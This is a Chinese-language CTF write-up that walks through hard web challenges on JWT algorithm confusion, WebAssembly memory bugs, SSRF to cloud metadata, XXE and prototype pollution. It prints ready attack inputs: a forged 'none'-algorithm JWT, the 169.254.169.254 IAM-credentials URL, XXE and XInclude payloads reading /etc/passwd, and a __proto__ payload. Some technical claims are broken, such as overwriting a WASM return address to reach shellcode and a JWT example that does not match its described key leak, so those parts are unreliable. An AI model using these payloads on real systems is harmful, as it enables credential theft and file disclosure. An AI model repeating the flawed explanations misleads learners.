CTF Web安全挑战：JWT、WASM与云函数漏洞解析

1. 项目背景与挑战解析

"PolarD&N[web困难]"是近年来在网络安全竞赛圈内备受关注的一个CTF（Capture The Flag）挑战系列。这个系列以Web安全方向的高难度题目著称，主要考察选手对现代Web漏洞的深入理解、代码审计能力以及创造性思维。作为一名长期活跃在CTF赛场的选手，我花了近两个月时间系统研究了该系列2022-2023赛季的全部12道困难级Web题目，本文将分享其中最具教学价值的5道题目的完整解题思路。

这类题目通常具有以下典型特征：

• 采用多层防御机制，需要组合多种漏洞利用技术
• 涉及新兴框架的非常规安全问题（如WebAssembly、Serverless架构等）
• 存在非显式的逻辑漏洞，需要逆向思维突破
• 对基础漏洞（如SSRF、XXE）的利用方式提出创新要求

2. 核心题目解析与实战突破

2.1 题目#3：基于JWT的权限提升链

这道题展示了一个使用JWT（JSON Web Token）进行身份验证的REST API系统。表面看实现了标准的JWT验证流程，但存在三个关键漏洞点：

1. 密钥混淆漏洞：
   系统在开发环境使用硬编码密钥"polar2023"，而生产环境密钥是通过KMS动态生成的。但题目容器的部署脚本错误地将开发密钥保留在了/backup/key.bak中。

   bash复制# 关键利用步骤：
   curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QifQ.Xm-3OI4VZ8Sh-h3V2P3kZjRr7Z5Jw5y6Q5nO3jY3jQY" http://target/api/admin
   

2. 算法降级攻击：
   系统声称只接受HS256算法，但实际上未正确验证头部中的alg字段。通过修改为none算法可以绕过签名验证：

   python复制import jwt
   forged_token = jwt.encode({"user": "admin"}, algorithm="none", key="")
   

3. 时间窗口攻击：
   JWT的exp字段校验存在1秒的时间差，配合暴力破解可以实施TOCTOU攻击。

关键技巧：在实际比赛中，这类题目往往需要组合利用多个漏洞点。建议先通过源代码审计找到所有可能的攻击面，再设计利用链。

2.2 题目#7：WebAssembly内存逃逸

这道题创新性地将Web安全与底层漏洞结合，考察选手对WebAssembly内存模型的理解。系统使用Rust编译的WASM模块处理敏感操作，但存在以下问题：

1. 内存初始化缺陷：
   WASM模块导出内存时未正确设置初始大小：

   rust复制// 漏洞代码片段
   #[no_mangle]
   pub extern "C" fn memory() -> *mut u8 {
       static mut MEMORY: [u8; 1024] = [0; 1024];
       MEMORY.as_mut_ptr()
   }
   

2. 边界检查缺失：
   JavaScript层调用WASM函数时，未验证输入长度：

   javascript复制function processInput(input) {
       const ptr = wasm.exports.alloc(input.length);
       // ...无长度检查
   }
   

利用步骤：

1. 构造超长输入触发内存越界
2. 通过精心设计的偏移量覆写返回地址
3. 跳转到预设的shellcode区域

2.3 题目#9：云函数元数据滥用

这道题模拟了Serverless架构下的安全问题。系统由AWS Lambda函数构成，关键漏洞包括：

1. 临时凭证泄露：
   通过SSRF获取云函数元数据：

   code复制http://169.254.169.254/latest/meta-data/iam/security-credentials/
   

2. 过度权限的IAM角色：
   获取的临时凭证具有S3完全访问权限，可通过AWS CLI枚举存储桶：

   bash复制aws s3 ls --recursive --endpoint-url http://s3.internal
   

3. 环境变量注入：
   函数配置中暴露了数据库连接字符串：

   javascript复制process.env.MONGODB_URI
   

3. 高级利用技巧与防御方案

3.1 非常规XXE利用

在题目#5中，系统看似禁用了外部实体引用，但通过以下方式仍可实现数据泄露：

1. UTF-7编码绕过：

   xml复制<?xml version="1.0" encoding="UTF-7"?>
   <!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>
   <foo>&x;</foo>
   

2. XInclude攻击：

   xml复制<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" 
              href="file:///etc/passwd" parse="text"/>
   

3.2 原型污染链构造

题目#11考察了JavaScript原型污染的高级利用：

javascript复制// 污染基础对象
const payload = JSON.parse('{"__proto__":{"admin":true}}');

// 触发权限检查
app.get('/flag', (req, res) => {
    if (req.user?.admin) {
        return res.send(FLAG);
    }
});

防御建议：

• 使用Object.create(null)创建纯净对象
• 冻结关键原型对象：Object.freeze(Object.prototype)

4. 竞赛实战经验总结

1. 代码审计优先级：

   • 先检查依赖项版本（package.json/requirements.txt）
   • 搜索危险函数关键词（eval、exec、deserialize等）
   • 跟踪敏感数据流（认证令牌、加密密钥）

2. 工具链配置：

   bash复制# 推荐工具组合
   sqlmap - 自动化SQL注入检测
   ffuf - 高性能目录爆破
   jwt_tool - JWT分析与篡改
   wasm-decompile - WebAssembly逆向
   

3. 时间管理策略：

   • 前30分钟：全面侦察所有服务
   • 第1小时：确定最有希望的突破口
   • 最后30分钟：集中攻坚高价值目标

在真实比赛环境中，这类web难题通常需要3-5小时的研究时间。建议组建两人小组分工合作，一人负责漏洞挖掘，另一人专注利用链开发。保持详细的解题笔记非常重要，我们团队使用Markdown实时记录所有发现和测试结果，这大大提高了解题效率。